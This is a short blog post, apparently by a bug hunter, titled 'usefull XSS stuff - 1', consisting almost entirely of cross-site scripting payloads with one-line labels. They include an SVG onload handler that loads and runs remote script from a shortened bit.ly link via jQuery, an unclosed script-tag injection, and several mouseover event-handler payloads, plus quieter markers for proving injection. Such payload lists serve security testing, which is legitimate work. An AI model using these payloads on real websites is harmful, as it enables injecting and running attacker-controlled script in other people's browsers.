Sunday, December 27, 2015

usefull XSS stuff - 1


svg-injection with jquery  
<svg/onload=$.getScript("http://bit.ly/1u47DEP")></svg>

short script injection (open tag works in some browsers)    
<script src=//<url></script

add comment to body
document.getElementsByTagName("body")[0].appendChild(document.createTextNode("<!-- bughunter -->"))

add hashtag to url (instead of alert - more silent ;) )          
document.location += "#bughunter"

picture onmouseover        
<picture onmouseover=alert(1)> <img src="http://bit.ly/ZgzZjs"> </picture>

href link mouseover        
<a href="http://bit.ly/ZgzZjs" onMouseOver=alert('XSS')>bughunter</a>